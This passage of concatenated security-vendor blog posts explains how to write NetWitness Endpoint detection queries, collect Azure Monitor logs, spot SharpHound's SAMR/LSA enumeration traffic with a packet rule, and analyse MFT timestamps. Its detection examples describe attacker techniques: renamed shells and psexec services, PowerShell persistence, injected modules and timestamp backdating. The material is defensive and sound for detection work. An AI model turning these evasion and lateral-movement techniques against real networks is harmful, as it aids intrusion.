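    PK_MachineModulePaths INTEGER PRIMARY KEY,
    FK_Paths INTEGER  -- nullable foreign key
);
INSERT INTO Paths VALUES (1, 'c:\\windows\\system32\\');
INSERT INTO MachineModulePaths VALUES (10, 1), (11, NULL);
""")

inner = con.execute("""
    SELECT mmp.PK_MachineModulePaths FROM MachineModulePaths mmp
    INNER JOIN Paths p ON p.PK_Paths = mmp.FK_Paths
""").fetchall()
left = con.execute("""
    SELECT mmp.PK_MachineModulePaths FROM MachineModulePaths mmp
    LEFT JOIN Paths p ON p.PK_Paths = mmp.FK_Paths
""").fetchall()
print(inner)  # the NULL-keyed module row is silently dropped
print(left)   # all module rows are retained
```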


Tables Used in IIOC

Figure 6: Tables Used in IIOC Query


As with the selected keys in the Required Fields section, in many cases there are separate tables based on the platform being queried. In these instances, the table name will be similar to its Windows counterpart with a special prefix denoting the platform. For example, the MachineModulePaths table that contains module information on a machine-specific basis is called MacMachineModulePaths for OSX and LinuxMachineModulePaths for Linux. Table 2 contains the table names in the NWE database that are most useful when creating IIOCs. Most of these tables are platform specific; however, a few apply to all operating systems. The next section will provide additional context for some of the Windows tables and their associated fields.


Table 2: Useful Tables for IIOC Creation


Table Relations and IIOC Conditions

The final portion of the IIOC query pertains to the conditions that must be met in order to return valid results. In other words, it is the part of the query that defines what the IIOC is attempting to detect. For a standard SQL select IIOC this logic is contained within the where clause of the statement at the end of the query. In this segment, we will be going further in depth into the relevant database tables and covering the most pertinent fields for IIOC conditions.


To assist with elaborating on database details, this section contains simple diagrams to illustrate the relationship between the various tables and their fields. These schema diagrams, which are very condensed, are not meant to include every relevant field that the tables describe. Additionally, for the sake of brevity, these cover the Windows versions. However, a similar pattern applies to the non-Windows operating systems when applicable.

Most IIOC queries will make use of the MachineModulePaths table to some degree, as it acts as an intersection between many of the other tables used by the NWE database. For this reason, it makes for a great starting point for our database examination.


Module Tables

Figure 7: Module Tables


MachineModulePaths contains keys to tables such as Paths, FileNames, and UserNames, referenced by FK_FileNames, FK_Paths, and FK_UserNames__FileOwner. These keys point to tables that primarily contain what their names describe (e.g. filenames, usernames, paths). Fields in these ancillary tables are generally valuable for filtering regardless of IIOC type, and are frequently referenced by other database tables, including the ones for alternate OS platforms. The query in Figure 8 is an example of a SQL select statement that utilizes these fields by joining their associated tables with MachineModulePaths.


Basic IIOC Filters

Figure 8: Basic Filters


At its core, MachineModulePaths contains aspects of modules that apply on a per-machine basis. This includes the various tracked behaviors, associated autoruns, and network activity. Network-related fields correspond to general network behavior, not the comprehensive network tracking that is stored in a different table. Table 3 provides a trimmed list of fields from MachineModulePaths that can be useful for IIOC filtering.


Table 3: MachineModulePaths Fields


MachineModulePaths also has a reference to the Modules table which contains more information about the executable. Unlike MachineModulePaths, the Modules table stores data about an executable that is immutable from machine to machine. This data includes the cryptographic hashes, executable header values, entropy, etc. Similar to the table provided for MachineModulePaths, Table 4 lists useful fields found within the Modules table.


Table 4: Modules Fields


Lastly, the Machines table comprises attributes of the machines on which a specific module was observed executing. This includes data such as the machine name, associated IP address, and OS version. All endpoints in NWE are listed in this table regardless of OS platform.


Next is the event tracking data, which for Windows endpoints is represented in the WinTrackingEvents* tables. While the diagram in Figure 9 only shows the WinTrackingEventsCache table, Windows event tracking actually utilizes two additional tables for permanent event storage (WinTrackingEvents_P0 and WinTrackingEvents_P1). Since WinTrackingEventsCache contains only the most recent events, it is the most efficient of these tables for IIOCs. However, with the populated data constantly migrating to another table, any IIOC that utilizes it will need to be set to persistent in order to be effective.


WinTrackingEventCache Table

Figure 9: WinTrackingEventCache Table


Tracking event tables contain a reference to a secondary table called LaunchArguments, which is also used by several other tables. An IIOC only needs to join this table with WinTrackingEvents* for the source command-line arguments, as many of the target process attributes are already stored as varchar fields in the table. Booleans for various event behaviors are also extremely useful for filtering events in these tables.


Table 5: WinEventTracking Fields


The table used to store network tracking data for Windows systems is called MocNetAddresses. This table tracks unique instances of network connections and their associated execution environment, such as the machine, module, and launch arguments. Unlike event tracking data, this table records both the module that initiated the network request (FK_MachineModulePaths) and the process it resides within (*__Process). The distinction is useful in cases where a loaded library is responsible for a network request, such as a service DLL in svchost.exe. There is also a secondary table, called Domains, that tracks the domain name of the associated request.


MocNetAddress Table

Figure 10: MocNetAddresses Related Tables


In addition to the domain, the IP and Port fields are also useful filters for the MocNetAddresses table. Network sessions with an RFC 1918 destination address can be disregarded using the NonRoutable field. A trimmed list of MocNetAddresses fields that can be used for IIOC conditions is provided in Table 6.


Table 6: MocNetAddresses Fields


Finally, we will briefly cover the scan data found inside the NWE database. These tables include additional information concerning autostarts, services or crons, memory anomalies, etc. Similar to the module and tracking data tables, the presence of scan-related tables is OS platform specific. For example, memory anomaly tables are currently only used by Windows systems, and tables such as bash history only apply to Linux endpoints.


Table 7: Scan Data Tables by Platform


Scan data tables can also be considered ephemeral datasets that are replaced upon a new scan. Thus, persistent IIOCs should be used when referencing these tables to avoid missing IIOC matches, especially in environments where scans are scheduled frequently.


Identifying New Columns and Tables

When attempting to determine the table and column associated with known fields in the NWE interface, it can be helpful to query the information_schema database. For instance, consider a circumstance where a user needs to create an IIOC based on a unique section name string in an executable, but does not know the corresponding column name within the database. In the UI, this field is located in the properties window of a specific module and is called "Sections Names". By querying the columns table and reviewing the results, it can be determined that a similarly named column is located in the Modules table.


InformationSchema Query

Figure 11: Information_Schema Query


In most cases, the field name in the UI will be almost identical to its corresponding column name within the database. Further filtering or sorting by the data type and expected table name can also be useful to identify the desired column when a large number of results are returned.
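SQL Server's information_schema.columns drives this lookup; as a runnable stand-in, the sketch below performs the equivalent search against SQLite's schema metadata for a mock Modules table (names are simplified placeholders, not the real NWE schema):

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute(
    "CREATE TABLE Modules (PK_Modules INTEGER PRIMARY KEY, SectionNames TEXT, MD5 TEXT)"
)

# On SQL Server the equivalent lookup would query information_schema.columns:
#   SELECT table_name, column_name, data_type
#   FROM information_schema.columns
#   WHERE column_name LIKE '%section%';
# SQLite exposes the same information through PRAGMA table_info.
tables = [row[0] for row in
          con.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
matches = [
    (tbl, info[1])                     # info[1] is the column name
    for tbl in tables
    for info in con.execute(f"PRAGMA table_info({tbl})")
    if "section" in info[1].lower()
]
print(matches)  # [('Modules', 'SectionNames')]
```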


Check for Errors

IIOC validation should initially be performed while crafting the query: check for any errors, and verify that the expected number of fields and values are returned when executing the query being tested. Once a new IIOC entry has been created and the query edited, refresh the window and check for an updated "Last executed" field. Also, make sure that the Active checkbox in the InstantIOC sub-window is marked. Note that it may take a few minutes from the time a new entry is set to active until the server executes the IIOC. To quickly identify any custom IIOCs that have been created, use the column filter on the "User Defined" field in the IIOC table.


User Defined IIOC Filter

Figure 12: IIOC Table Filter on “User Defined” Field


If any errors occur when the IIOCs are executed by the database, the entire row for the failed IIOC will be italicized. There will also be a message in the "Error Message" field providing additional context as to why the failure occurred. In the example in Figure 13, the highlighted IIOC entry called "Test IIOC" returned an error for an invalid column name. In this case, the first selected field had a minor typo and should have been referenced as "fk_machines".


IIOC Error

Figure 13: IIOC Table with Error Returned


Tip: SQL Query

Analyzing data directly from the back-end database is outside the scope of this article; however, a useful tip for IIOC development is to include a "human readable" query alongside any custom-developed IIOC. Doing so allows the analyst to review all the relevant data related to the query instead of just seeing the machines and modules associated with the IIOC in the interface. In the example shown in Figure 14, there is an additional query that is commented out. Instead of selecting the keys listed in the Required Fields section, this query selects fields that provide additional context to the analyst, typically based on the fields in the IIOC condition.


Human Readable Query

Figure 14: IIOC with Human Readable Query


Since the second query has been commented out, it does not affect the IIOC in any way. However, it does provide the analyst with the means to quickly gain additional information regarding the related events. Executing the query, as shown in Figure 15, provides previously unseen information such as source and target arguments and the event time. This information would normally only be available on a per machine basis in the interface. Reviewing data in this manner is especially useful when analyzing queries that return a high number of results and potential false positives.


Query Results

Figure 15: Database Query Results


Custom IIOC Examples

The following section covers examples of IIOCs that are not included by default as of the current version. Each example is based on potentially anomalous behavior or observed threat actor techniques.


Filename Discrepancies

There are many instances where a modified filename could be an indicator of evasive execution on a machine. In other words, it could be evidence of an attempt to avoid detection by antivirus or monitoring systems. The following IIOCs compare module attributes with the associated filename for anomalies based on observed techniques.


Copied Shell

Windows accessibility features have long been a known target of replacement, by both malicious actors and system administrators, as a way to regain access to a system. Furthermore, actors occasionally rename shells and scripting hosts to bypass security monitoring tools. For these reasons, the following IIOC looks for instances of Windows shells and scripting hosts that have been renamed. It also looks for instances where the trusted installer user ("NT SERVICE\TrustedInstaller") is no longer the owner of one of these files.


Copied Windows Shell

Figure 16: Copied Windows Shell
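The logic behind this kind of filename-discrepancy IIOC can be sketched against a mock Modules table (a hypothetical, simplified schema; the real query joins several NWE tables): flag modules whose file description identifies a Windows shell while the on-disk filename no longer matches.

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE Modules (FileName TEXT, Description TEXT)")
con.executemany("INSERT INTO Modules VALUES (?, ?)", [
    ("cmd.exe", "Windows Command Processor"),
    ("totally_legit.exe", "Windows Command Processor"),  # renamed shell
    ("calc.exe", "Windows Calculator"),
])

# The file description is immutable on rename, so a shell description
# paired with an unexpected filename is suspicious.
rows = con.execute("""
    SELECT FileName FROM Modules
    WHERE Description = 'Windows Command Processor'
      AND LOWER(FileName) <> 'cmd.exe'
""").fetchall()
print(rows)  # [('totally_legit.exe',)]
```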



Currently, there is a built-in IIOC called "Run Remote Execution Tool" that looks for instances of Psexec execution. However, a common issue in endpoint monitoring is a lack of full visibility, and consequently the machine running the client program is not always observed. Therefore, when looking for evidence of potential lateral movement, it is important to monitor for suspect behavior on the target machine as well.


Psexec is known to create a service on the target machine using the executable “psexesvc.exe”. It also provides the ability for the user to change the name of the service, and subsequently the name of the executable to a different value. Similar to the previous example, this change in name does not affect the file description of the executable. Thus, the IIOC author can specifically look for occurrences of this name modification. The creator of this IIOC could also choose to include instances of the normal psexec service filename by omitting the second condition, but a separate IIOC with a higher IIOC level would be more appropriate.


Renamed Psexesvc

Figure 17: Renamed PSexesvc Process


Suspicious Launchers

Malware and malicious actors often utilize proxied execution, or launchers, for their persistence mechanisms in order to bypass security monitoring tools. PowerShell is a prime example of a program that facilitates this behavior in Windows. Executing this program upon startup provides an attacker with a wealth of functionality within a seemingly legitimate executable.  The IIOC shown in Figure 18 identifies instances of PowerShell that are associated with a persistence mechanism on an individual machine.


PowerShell Autostart

Figure 18: PowerShell Autostart


Typically, legitimate instances of this functionality created by system administrators will simply reference a PowerShell script instead of the PowerShell module itself. Nonetheless, analysts should still be cognizant of potentially valid instances. This is demonstrated in the next query in Figure 19, which contains additional conditions that filter for autostart programs or scheduled tasks matching the given keyword.


Figure 19: PowerShell Autoruns and Scheduled Tasks


This new query utilizes a SQL union to combine the results of two select statements. Instead of initially selecting from the MachineModulePaths table and filtering its rows, this query uses two tables that contain additional startup program information. With these additional data points, the IIOC author can filter on attributes such as task name and registry path; an example of the latter would be a unique run key name. Since this second IIOC utilizes tables from scan data, it would need to be set to persistent.
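The union pattern described above can be sketched with mock autorun and scheduled task tables (hypothetical, simplified names, not the real NWE schema):

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE AutoRuns (FK_Machines INTEGER, RegistryPath TEXT, Arguments TEXT);
CREATE TABLE ScheduledTasks (FK_Machines INTEGER, TaskName TEXT, Arguments TEXT);
INSERT INTO AutoRuns VALUES
    (1, 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater',
     'powershell -enc AAAA');
INSERT INTO ScheduledTasks VALUES (2, 'Maintenance', 'powershell -File clean.ps1');
INSERT INTO ScheduledTasks VALUES (3, 'Backup', 'robocopy d: e:');
""")

# A union merges the two persistence sources into one result set,
# filtering each on the same keyword.
rows = con.execute("""
    SELECT FK_Machines, RegistryPath FROM AutoRuns
    WHERE Arguments LIKE '%powershell%'
    UNION
    SELECT FK_Machines, TaskName FROM ScheduledTasks
    WHERE Arguments LIKE '%powershell%'
""").fetchall()
print(sorted(rows))  # machines 1 and 2 match; machine 3 does not
```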


PowerShell Injected Code

Figure 20: Floating Module in PowerShell in UI


Another attribute of a process that may be indicative of a malicious launcher is the presence of injected code. Executable files that circumvent the Windows image loader, otherwise known as reflective loading, as well as libraries that have been unreferenced from PEB ldr_data lists will show up in the NWE UI as “Floating Modules.” While there is already an IIOC looking for the presence of these modules, augmenting the existing query by including known launcher processes such as PowerShell can produce inherently more suspicious results. By increasing the specificity of the query, we now have an additional IIOC that is a higher indicator of malicious activity.


Figure 21: Floating Module in PowerShell Query


There are numerous modules other than PowerShell that can be utilized to initiate execution on Windows systems such as mshta, rundll32, regsvr32, installutil, etc. Similar IIOCs for all of these modules can be useful for monitoring evasive execution or persistence. However, in each case, there will be filtering required that is specific to an individual organization.


The End.

Hopefully this article has provided insight into custom IIOC creation. It has covered the key components of basic IIOCs and provided steps for their creation. Additionally, it has discussed the most useful backend database tables and fields used for building IIOC queries. Lastly, it has provided examples that can be used to identify real-world attacker techniques.



Customers that use Azure cloud infrastructure require the ability to enable their Security Operations Center (SOC) to monitor infrastructure changes, service health events, resource health, autoscale events, security alerts, diagnostic logs, Azure Active Directory Sign-In and Audit logs, etc. The RSA NetWitness Platform is an evolved SIEM that natively supports many third-party sources such as Azure Active Directory Logs, Azure NSG Flow Logs, and now Azure Monitor Activity and Diagnostic Logs, for depth of visibility and the insights needed by SOC analysts and threat hunters.


Azure Monitor Activity and Diagnostic Logs background:


The Azure Activity Log is a subscription log that provides insight into subscription-level events that have occurred in Azure. This includes a range of data, from Azure Resource Manager operational data to updates on Service Health events. Using the Activity Log, you can determine the ‘what, who, and when’ for any write operations (PUT, POST, DELETE) taken on the resources in your subscription. You can also understand the status of the operation and other relevant properties. The Activity Log does not include read (GET) operations or operations for resources that use the Classic/"RDFE" model.


Azure Monitor diagnostic logs are logs emitted by an Azure service that provide rich, frequent data about the operation of that service. Azure Monitor makes available two types of diagnostic logs:

  • Tenant logs - These logs come from tenant-level services that exist outside of an Azure subscription, such as Azure Active Directory logs.
  • Resource logs - These logs come from Azure services that deploy resources within an Azure subscription, such as Network Security Groups or Storage Accounts.


Azure Monitor Activity Logs:


Azure Monitor Diagnostic Logs:


Azure Monitor Active Directory Logs:


Azure Monitor Activity, Diagnostic and Azure Active Directory Logs can be exported to an Event Hub. The RSA NetWitness Platform’s Azure Monitor plugin collects the logs from this Event Hub.




*In Log Collection, Remote Collectors send events to the Local Collector, and the Local Collector sends events to the Log Decoder.


Configuration Guide: Azure Monitor Event Source Configuration Guide

Collector Package on RSA Live: "MS Azure Monitor Log Collector Configuration"

Parser on RSA Live: CEF

When attacking or defending a network, it is important to know the strategic points of the environment. When an environment runs Active Directory, as almost every organization in the world does, it is important to understand how rights and privilege relationships work, as well as how they are implemented. With relative ease, an attacker can take advantage of the fact that an unintended user was somehow added to a group with more elevated privileges than he/she needs. Once they identify this, the battle might be over before the defender has a chance to know what happened. In this blog post, we will go through how RSA NetWitness Network/Packets can be utilized to detect if BloodHound's Data Collector (known as SharpHound) is being used in your environment to enumerate group membership via the LocalAdmin Collection method.


In order to automate the process of determining the privilege relationships in an environment, the incredibly talented group of @_wald0, @CptJesus, and @harmj0y created a very popular tool aptly named BloodHound. You can find this awesomeness on the project's GitHub page. The tool is a single-page JavaScript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell/C# ingestor. The tool utilizes graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. This is an incredibly awesome tool that provides much needed insight into what is often a forgotten or mismanaged process. If you haven't tried it out in your environment, whether offensive or defensive minded, I'd recommend it.


SharpHound is a completely custom C# ingestor written from the ground up to support collection activities. Two options exist for using the ingestor, an executable and a PowerShell script. Both ingestors support the same set of options. SharpHound is designed targeting .Net 3.5. SharpHound must be run from the context of a domain user, either directly through a logon or through another method such as RUNAS. The functionality we will be analyzing in this blog post is only a small percentage of what BloodHound/SharpHound can do and other portions will be covered in upcoming blog posts.


First let’s tackle some minimum requirements & some assumptions that we have put in place:

#1) This assumes you have a TAP location feeding your Decoder(s) somewhere between your workstations & your Domain Controllers (DC). This is a best practice to ensure that traffic flows to all critical devices, including DCs, are being captured.

#2) You've created a Feed with a list of your Domain Controllers and are tagging them appropriately. (While not 100% necessary, this will definitely aid in analysis.) This can easily be accomplished by modifying the Traffic Flow Lua Parser to include DC subnets, or one by one. Please see this guide for further details.

#3) The BloodHound Data Collector is performing the Local Admin Collection Method. SharpHound has several different enumeration options, as listed on BloodHound's GitHub wiki; while it's possible to catch some of these other options, this post will focus on how its Local Admin Collection Method works. Further technical details on how this method works can be found in @cptjesus's blog post: CptJesus | SharpHound: Technical Details.

#4) I am not an Active Directory or BloodHound expert by any stretch. What is detailed in this blog post is what a colleague (Christopher Ahearn) & I discovered by attempting to help our clients detect badness.


Now then, let’s begin.


Group Enumeration

As soon as SharpHound starts up, it will attempt to connect to the workstation's default Domain Controller over LDAP (TCP port 389) with the current user's privileges in order to enumerate information about the domain. It is important to note that the latest version (2.1) of SharpHound will grab a list of domain controllers available for each domain being enumerated, starting with the primary domain controller, and then do a quick port check to see if the LDAP service is available[1]. Once the first one is found, it will cache the domain controller for that domain and use it for LDAP queries. In our testing, this traffic contains LDAP searchRequests and binds, then becomes encrypted with SASL, which provides no insight into what's actually being enumerated, as depicted below. I know, frustrating.



However, depending on the size of your domain, this can be an indicator itself, as there can be a lot of data being transferred. Looking for one host with an abnormal amount of LDAP traffic can be a starting point for finding BloodHound; however, this is highly dependent on your environment, as there may be legitimate reasons for the traffic.

What happens next can be used as a higher-fidelity alert. The host running BloodHound will attempt to enumerate the group memberships for users found in the LDAP queries, and it does so in a unique manner. In order to enumerate this information, the host creates an RPC over SMB connection to the Domain Controller. First, the host creates a named pipe to SAMR (the Security Account Manager (SAM) Remote Protocol, client-to-server) over the IPC$ share.


Once this is accomplished, the RPC Bind command is used to officially connect the RPC session. Now that the RPC session is available, SharpHound will issue requests in the following order:

  1. Connect5
  2. LookupDomain
  3. OpenDomain
  4. OpenAlias
  5. GetMembersInAlias



To start off, the SamrConnect5 method obtains a handle to a server object, requiring only a string input for the ServerName. Next, the session calls SamrLookupDomaininSamServer, which requires the server object handle provided by SamrConnect5, in order to look up the domains hosted by the server-side protocol. Now that the session has a handle to work with, it uses SamrOpenDomain to obtain a handle for the domain object. As you can see, this is an iterative process to obtain handles for, first, the server object, then the domain object, which is then used in SamrOpenAlias to obtain a handle to an alias. Finally, the session uses the alias handle as input to SamrGetMembersinAlias with the goal of enumerating the SIDs of the members of the specified alias object. After SamrGetMembersinAlias completes its response, the SAMR session is closed, and in its place a Local Security Authority (LSA) RPC session is started.


As the name states, the lsarpc interface is used to communicate with the LSA subsystem. Similar to how SharpHound had to find all the necessary handles in order to enumerate the SIDs in a given group, it must also obtain a policy handle to convert the SIDs discovered via SamrGetMembersinAlias. To do that, it utilizes OpenPolicy2, which only requires the SystemName, which in this case is the DC. Once OpenPolicy2 has finished and acquired the policy handle, the session calls the LookupSids2 method to resolve the SIDs acquired from SamrGetMembersinAlias. The Data Collector now has all the information it needs to report which users are in which groups.
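As a toy illustration of why this ordered call sequence is detectable, the sketch below (a hypothetical helper, not a NetWitness API) checks whether a session's observed action metadata contains the SAMR enumeration calls followed by the LSA SID lookups, in order:

```python
# Toy detector: checks that a session's action metadata contains the SAMR
# group-enumeration calls followed by the LSA SID-resolution calls, in order.
# This is an illustration only, not a NetWitness API.
SEQUENCE = [
    "samrconnect5", "samrlookupdomaininsamserver", "samropendomain",
    "samropenalias", "samrgetmembersinalias",
    "lsaropenpolicy2", "lsarlookupsids2",
]

def matches_bloodhound_pattern(actions):
    actions = [a.lower() for a in actions]
    pos = 0
    for needed in SEQUENCE:
        try:
            # Each call must appear after the previous one in the session.
            pos = actions.index(needed, pos) + 1
        except ValueError:
            return False
    return True

session = ["smb_bind", "samrconnect5", "samrlookupdomaininsamserver",
           "samropendomain", "samropenalias", "samrgetmembersinalias",
           "samrclosehandle", "lsaropenpolicy2", "lsarlookupsids2"]
print(matches_bloodhound_pattern(session))  # True
```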


During RSA's enterprise testing of BloodHound, this unique way of enumerating group membership via SamrGetMembersinAlias, and subsequently looking up the acquired SIDs via LsarLookupSids2 in the same session, has had a very high detection rate for BloodHound activity. It should be noted that this activity could potentially be normal, depending on the administration techniques in use; however, during our testing in various large environments we have not found an instance of its usage in that capacity.


Detecting with RSA NetWitness Packets

NetWitness Packets does an incredible job dissecting the various RPC and SMB actions that cross capture points, which makes creating detection rather simple. Since the RPC session is transported via SMB, all of the necessary metadata found in our analysis is in one session.



The following application rule will flag sessions which contain this activity.


(service = 139) && (directory = '\IPC$\') && (analysis.service = 'named pipe') && (filename = 'samr') && (action = 'samrconnect5') && (action = 'samrlookupdomaininsamserver') && (action = 'samropendomain') && (action = 'samropenalias') && (action = 'samrgetmembersinalias') && (action = 'lsaropenpolicy2') && (action = 'lsarlookupsids2')


Wrapping Up

This blog's intent was to present new and interesting ways to detect BloodHound traffic, specifically in the context of running the LocalAdmin Collection method from a workstation in a domain against a DC. It's possible that this traffic could be generated legitimately by an administrator's script, or that it might be an indicator of another tool using a similar enumeration method. Every environment is different, and each needs to be analyzed with the proper context in mind, including this traffic. If you are defending a network, I would encourage you to try out BloodHound, even if it's just in a lab environment, and see what your toolsets can detect. If you're not already monitoring traffic going in and out of your DCs, I would also encourage you to run more playbooks beyond this one attack vector to help determine potential visibility gaps. In upcoming blog posts we'll attempt detection of other methods used by BloodHound.



RSA NetWitness Endpoint (NWE) offers various ways to alert the analyst to potentially malicious activity. Typically, we recommend that an analyst look at the IIOCs daily, and investigate and categorize (whitelist/graylist/blacklist) any hits on IIOC Level 0 and Level 1.


When an IIOC highlights a suspicious file or event, the next investigative step is to look at the endpoint where the IIOC hit, and investigate everything related to the module and/or event. Depending on the type of IIOC, the analyst can get answers related to the file/event in any or all of the following categories of data:

  • Scan data
  • Behavioral Tracking Events
  • Network Events

NWE Data Categories


If we focus on a Windows endpoint, regardless of whether it is part of an investigation or a standalone infected system, we always complement the analysis of the data automatically collected by the agent with an analysis of the endpoint's Master File Table (MFT). There are very good reasons to always analyze the MFT in these situations. Let me list the main reason here:

  • The automatically collected data (scan, behavioral, network) is always a subset of all the actual events that happen on the endpoint. Namely, the agent collects process, file, and registry related events, but with some limitations. For example, while the agent records file events, it focuses on executable files rather than all file activity. Looking at the MFT around the time of the event enables the analyst to discover and collect additional artifacts related to an incident, such as non-executable files. These can be anything from the output of a tool the attacker executed (such as a password dumper), to archive files related to data theft activity, to configuration files for a Trojan, etc.


Let us first describe some key concepts related to the MFT so that you can get the best value out of your analysis of it. 


What is the MFT?

In general, when you partition and format a drive in Windows, you will likely format it with the New Technology File System (NTFS). The MFT keeps track of all the files that exist on the NTFS volume, including the MFT file itself. The MFT is a file actually named $MFT on the volume, and the very first entry inside this file is a record about the $MFT file itself. Just so you are aware, on average an MFT file is around 200MB. If you open a $MFT file using a hex editor, you can see the beginning of each MFT record marked by the word "FILE":


MFT Record Example
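If you want to poke at a $MFT export yourself, that fixed record signature makes a quick sanity check easy. A minimal sketch, assuming a raw copy of $MFT and the common 1024-byte record size (both assumptions; record size can vary by volume):

```python
def count_mft_records(data: bytes, record_size: int = 1024) -> int:
    """Count MFT records by their 4-byte signature.

    Valid records start with b'FILE'; b'BAAD' marks records the filesystem
    flagged as corrupt, so we skip those.
    """
    count = 0
    for offset in range(0, len(data) - 4, record_size):
        if data[offset:offset + 4] == b"FILE":
            count += 1
    return count

# Typical usage against an exported $MFT copy:
#   with open("mft_copy.bin", "rb") as f:
#       print(count_mft_records(f.read()))
```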


The MFT keeps track of various information about the files on the file system, such as filename, size, timestamps, and file permissions, as well as where the actual data of the file exists on the volume. The MFT does not contain the data of the file (unless the file is very small, under roughly 512 bytes, in which case its data can be resident inside the MFT record itself); instead, it contains metadata about each file and directory on the volume. Perhaps the easiest way to understand the MFT is to think of a library that uses index cards to keep track of all the books in it. The MFT is like the box containing these index cards, where each index card tells you the title of the book and where to find it in the library. The index card is not the book; it just contains information about the book.


The library analogy is also useful to describe a few other concepts regarding the MFT. In this imaginary library, the index cards are never discarded, but rather reused. So, when the library wants to remove a book from its records, it would just mark the index card related to the book as available to contain the information about some new book. Notice that in this situation the index card still contains the old information, and the book is still sitting on a shelf in the library. This situation remains true, until the information in the index card is overwritten by the information of a new book. What we are describing here is the process of a file deletion in Windows (and we are not talking about the Recycle Bin here but actual file deletions). Namely, when a file is deleted in Windows, the MFT record for that file is marked as available to be overwritten by some other new file that will be created in the future. So, deleting a file does not mean deleting its information, or the actual data of the file. Windows just does not show the user files marked as deleted in the MFT. The data may still be there though, and depending on how busy the system is, i.e. how many files are created/deleted, you have a good chance of recovering a deleted file if you get to it before it is overwritten.


When NWE parses the MFT, it shows you both regular MFT records, and those that have been marked as Deleted. The deleted records can also be grouped by themselves (more on this later). However, NWE does not do file recovery, meaning it will not get you the data of a deleted file. It will only show you the information that exists in the MFT of that deleted file. In order to recover a deleted file, you will need to use other forensic tools on the actual endpoint, or an image of the drive, to recover the data of the deleted file. NWE is able to retrieve any other file referenced in the MFT that is not marked as deleted.


MFT Timestamps

Another very important concept about the MFT relates to file timestamps. The MFT contains 8 timestamps for each file (a folder is also treated as a file in the MFT) on the endpoint. These 8 timestamps are contained within two attributes, named $STANDARD_INFORMATION ($SI) and $FILE_NAME ($FN). Each of these attributes contains the following four timestamps:


   $SI Timestamps            $FN Timestamps
   - Created                 - Created
   - Modified                - Modified
   - Accessed                - Accessed
   - MFT Entry Modified      - MFT Entry Modified


Whenever you look at the properties of a file using explorer.exe, you see the first three $SI timestamps. Here is an example of looking at the properties of a file named kernel32.dll:


Explorer.exe showing $SI timestamps


So, you may wonder what the MFT Entry Modified time is, and what the purpose of the equivalent timestamps under the $FN attribute is. The MFT Entry Modified is a timestamp that keeps track of when changes are made to the MFT record itself. Think of it as when the library index card is updated: Windows keeps track of those updates through this MFT Entry Modified timestamp. Windows does not show this timestamp through explorer.exe or any other native Windows tools because it is not relevant to the typical user.
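Under the hood, all eight of these timestamps are stored in the same on-disk format: a 64-bit FILETIME value counting 100-nanosecond intervals since January 1, 1601 (UTC). If you ever need to decode one yourself from a raw record, the conversion is a few lines:

```python
import struct
from datetime import datetime, timedelta, timezone

# NTFS/Windows FILETIME epoch
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(raw: bytes) -> datetime:
    """Decode an 8-byte little-endian FILETIME (100-ns ticks since 1601-01-01 UTC)."""
    (ticks,) = struct.unpack("<Q", raw)
    # 10 ticks of 100 ns = 1 microsecond
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)
```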


Typically, when we talk about a file, in our mind we think of it based on its name. However, the name of a file is just one property of a file. This distinction is important as we talk about the $FN timestamps. Whenever a file is created so is its filename, because in order to create a file you have to specify a name. However, Windows creates two sets of timestamps associated with a file object. You can think of the $SI timestamps as associated with the file object itself, and of the $FN timestamps as associated with the filename of the file object.


The reason why we are talking about all these timestamps is that during the analysis of an MFT, time is critical in identifying relevant events. You want to ensure that you are sorting the files based on a reliable timestamp. When it comes to the fidelity of the timestamps, the $FN timestamps are your friend. It is trivial to change the $SI timestamps (Created, Modified, Accessed); in fact, Windows has API functions that allow you to do exactly that. So, many attackers code their droppers to manipulate the $SI timestamps of their files, so that a typical user viewing the properties of a file in explorer.exe is tricked into believing the file was created much further in the past than in reality (attackers typically backdate files). During our analysis of the MFT we therefore sort files by their $FN Created time or the $FN MFT Entry Modified time, since these will likely hold the exact time the file was created on disk. There are various situations (a file renamed, moved within the same volume, moved to a different volume, etc.) that affect these 8 timestamps in different ways depending on the Windows operating system. We will not cover these here, as they would require a blog of their own; for more details on these situations there are various write-ups online.
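The $SI-versus-$FN comparison described above can be sketched in a few lines. The record dicts here are a hypothetical stand-in for rows exported from an MFT parser; a $SI creation time that predates the $FN creation time is a classic sign of backdating:

```python
def flag_timestomped(records):
    """Return records whose $SI creation time predates their $FN creation time.

    $FN creation is set when the file is born on disk and is much harder to
    alter, so si_created < fn_created suggests the $SI times were stomped.
    """
    return [r for r in records if r["si_created"] < r["fn_created"]]
```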


How To Request and Open the MFT

  • Since a Windows endpoint may have multiple NTFS volumes it means that each volume (or partition, or drive letter) will have its own MFT. So, if the endpoint has multiple drive letters C:, D:, E:, etc, each of them will have its own MFT. In NWE you can request the MFT by right-clicking the endpoint's machine icon, Forensics > Request MFT.


Steps to request MFT


  • NWE will request the Default Drive, which means it will request the MFT from the volume where Windows is installed (typically C:). However, here you can request the MFT of any drive letter from the drop down.


Request MFT by drive letter


  • You may wonder how you would know in advance how many volumes exist on the endpoint. This information is available to the analyst under the More Info tab:


More Info tab


  • Once you request the MFT, it will show up within a few seconds under the Downloaded tab. This is where you should also open the MFT. In order to open the MFT, you should right click on the MFT and select Download and Open MFT. NWE will then ask you where you want to save the MFT file itself. It is a good practice to have a folder named Analysis, under which you can create subfolders for each endpoint you are investigating. Under this subfolder you can save all the artifacts related to this endpoint, including the MFT.


How to open downloaded MFT


Sample MFT Analysis


When you open the MFT using the method described above, NWE will automatically associate the MFT with the endpoint that it came from. NWE will assume the MFT belongs to the C: volume. If this is not the case you can change the drive letter as shown below:


MFT drive letter and endpoint

As you can see on the left side you can select various folders under the root of C:, look at only files that are marked as deleted in the MFT, or look at All Files. Generally, we want to look at all files to get a global view of everything and start our analysis with whatever file brought us to this system. Sometimes, it is not necessarily a particular file but an event in time. In this case we can then start our analysis by looking at files at that particular time. 


Before we look at an example, let us also talk about what columns you should have in front of you to ensure you can be successful in your analysis. We recommend that you have at least the following columns exposed (hiding the rest if you wish) in this order from left to right. 

  • Filename
  • Size
